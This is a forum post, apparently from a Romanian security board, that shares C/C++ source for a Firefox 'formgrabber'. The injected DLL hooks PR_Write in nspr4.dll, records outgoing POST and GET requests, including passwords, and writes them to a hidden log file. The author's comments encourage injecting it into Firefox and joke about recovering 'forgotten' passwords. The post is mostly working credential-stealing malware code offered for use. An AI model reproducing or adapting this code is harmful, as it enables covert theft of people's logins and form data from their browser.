Jump to content
Nytro

[C] FireFox Formgrabber

By Nytro, in Programare

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[C] FireFox Formgrabber

Author: datemme

Heres an example for a Firefox Formgrabber:

dllmain:

#include "hookdll.cpp"

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		Funktion();
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

HookDll.cpp :

// hookdll.cpp : Definiert die exportierten Funktionen für die DLL-Anwendung.

#include <iostream>
#include <fstream>
using namespace std;

#pragma once
#include <windows.h>
#include <prio.h>
#pragma comment (lib, "nspr4.lib")
BYTE hook[6];

DWORD HookFunction(LPCSTR lpModule, LPCSTR lpFuncName, LPVOID lpFunction, unsigned char *lpBackup)
{
	DWORD dwAddr = (DWORD)GetProcAddress(GetModuleHandle(lpModule), lpFuncName);
	BYTE jmp[6] = { 0xe9,	//jmp
		0x00, 0x00, 0x00, 0x00,	//address
		0xc3
	};	//retn

	ReadProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, lpBackup, 6, 0);

	DWORD dwCalc = ((DWORD)lpFunction - dwAddr - 5);	//((to)-(from)-5)

	memcpy(&jmp[1], &dwCalc, 4);	//build the jmp

	WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, jmp, 6, 0);

	return dwAddr;
}

BOOL UnHookFunction(LPCSTR lpModule, LPCSTR lpFuncName, unsigned char *lpBackup)
{
	DWORD dwAddr = (DWORD)GetProcAddress(GetModuleHandle(lpModule), lpFuncName);

	if (WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, lpBackup, 6, 0))
		return TRUE;
	return FALSE;
}

int WriteLog(const char * Filename,char * Text)
{
     ofstream File;                   //Names File as ofstream (for output to file)                               //Closes file
     File.open(Filename,ios::app);    //Reopens file to append, if you just used ios::out again, it would erase everything and rewrite the file
     File << Text;                    //Outputs to file
     File.close();                    //Closes opened file
	 SetFileAttributes( Filename , FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_NORMAL );
     return 1;

}

PRInt32 cPR_Write(
PRFileDesc *fd,
const void *buf,
PRInt32 amount)
{
UnHookFunction("nspr4.dll", "PR_Write", hook);
PRInt32 hResult = PR_Write(fd,buf,amount);
if(strncmp((LPCSTR)buf,"POST",lstrlen("POST"))==0){WriteLog("test.txt",(char*)buf);};
if(strncmp((LPCSTR)buf,"GET",lstrlen("GET"))==0){WriteLog("test.txt",(char*)buf);};

HookFunction("nspr4.dll", "PR_Write", cPR_Write, hook);
return hResult;
}


extern "C" void __declspec(dllexport) Funktion()
{
	HookFunction("nspr4.dll", "PR_Write", cPR_Write, hook);
}

//U need to download Gecko SDK (google it) and set the additional Include path und Lib path in project details

//vc++ 2008 compiled in multibyte mode

//inject it in FF and have Fun !!!

//can be very usefull if u "forgot" your password on a website

//advantage compared to Pw-Grabbers and Keylogges: logs manualy inserted passwords and saved passwords both

//you can ofcourse filter for special tags with slightly modification

datemme

Sursa: FireFox Formgrabber

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...